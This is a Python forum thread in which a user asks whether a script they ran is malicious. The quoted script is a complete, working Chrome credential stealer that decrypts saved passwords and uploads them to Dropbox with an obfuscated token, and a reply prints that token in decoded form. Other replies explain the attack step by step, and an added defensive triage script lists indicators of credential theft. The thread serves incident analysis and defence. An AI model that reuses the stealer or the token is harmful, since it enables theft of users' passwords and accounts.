Python Forum

Help! I accidentally ran a file without checking the code
So I accidentally ran this file today, and didn't check the Python code. Can anybody tell me if this code is malicious?
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass


def upload_passfile():
    access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
    file_from = "rc.txt"
    file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
    client = dropbox.Dropbox(access_token)
    client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass

    except Exception as e:
        decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
        return str(decrypted_pass[1])


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        passfile = open("rc.txt", "w")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
        passfile.close()
        conn.close()

    except Exception as e:
        print(e)

    upload_passfile()
    os.remove("rc.txt")
    os.remove("Loginvault.db")
Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.
I had this issue too, but after some code analysis I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).
Hm, the hacker should have used pathlib, and his hack works only on Windows.

  1. Getting the master key from Chrome
  2. Copying Login Data to another place (Chrome locks the database)
  3. Iterating over the SQL SELECT of logins and passwords, saving line by line in a text file rc.txt, using the master key to decrypt
  4. Sending the rc.txt to a Dropbox account
  5. Deleting the rc.txt and the copy of the login database

One thing is strange. Where does the dropbox module come from?
This hack can only work if the dropbox dependency is installed in your current Python interpreter.

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
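As an added example (not code from this thread or from any poster), here is how a defender can triage a script like the one above before running it: parse it with `ast` instead of executing it, undo the `encode(..., 'rot13')` trick on string literals, and flag the combination DeaD_EyE describes (browser credential store access, DPAPI decryption, Dropbox upload, cleanup). The indicator lists and the SAMPLE script are constructed assumptions; the sample's token is a placeholder, not the one from the thread.

```python
import ast
import codecs
# Heuristic indicator lists (assumption), matched as substrings against call names and string literals.
INDICATORS = {
    "browser_credential_store": {"Login Data", "Local State", "os_crypt", "FROM logins"},
    "dpapi_decrypt": {"win32crypt.CryptUnprotectData"},
    "exfiltration": {"dropbox.Dropbox", "files_upload", "requests.post"},
    "cleanup": {"os.remove", "shutil.rmtree"},
    "obfuscation": {"rot13", "base64.b64decode"},
}

def _dotted(node):
    """'a.b.c' for a Name/Attribute chain; a method on an intermediate expression keeps only its attr."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts)) or None

def triage(source):
    """Parse (never execute) untrusted source: {category: matches}, decoded rot13 literals, verdict."""
    tokens, decoded = set(), []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            tokens.add(node.value)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name:
                tokens.add(name)
            consts = [a.value for a in node.args if isinstance(a, ast.Constant)]
            if name and name.endswith("encode") and len(consts) == 2 and consts[1] == "rot13":
                decoded.append(codecs.decode(consts[0], "rot13"))
    hits = {cat: sorted({t for t in tokens if any(i in t for i in inds)})
            for cat, inds in INDICATORS.items()}
    hits["decoded_rot13"] = decoded
    # The thread's pattern: read a browser credential store, then ship it out.
    hits["likely_stealer"] = bool(hits["browser_credential_store"] and hits["exfiltration"])
    return hits
# Constructed sample mimicking the thread's script; token is rot13 of "PLACEHOLDER_TOKEN".
SAMPLE = r'''
import os, sqlite3, win32crypt, dropbox, codecs
TOKEN = codecs.encode("CYNPRUBYQRE_GBXRA", "rot13")
def run():
    db = os.environ["USERPROFILE"] + r"\AppData\Local\Google\Chrome\User Data\default\Login Data"
    key = win32crypt.CryptUnprotectData(b"blob", None, None, None, 0)
    dropbox.Dropbox(TOKEN).files_upload(b"data", "/p.txt")
    os.remove("rc.txt")
'''
```

Running `triage(SAMPLE)` reports every category with its matching call names and literals, which is enough to decide to delete the file and rotate credentials without ever importing it.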
(Dec-25-2020, 02:10 PM)DeaD_EyE Wrote:
PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
Probably you can report them. It most likely violates Dropbox ToS.
They are investigating now, but the team is not allowed to visit external URLs.
So I also provided them with the source code today.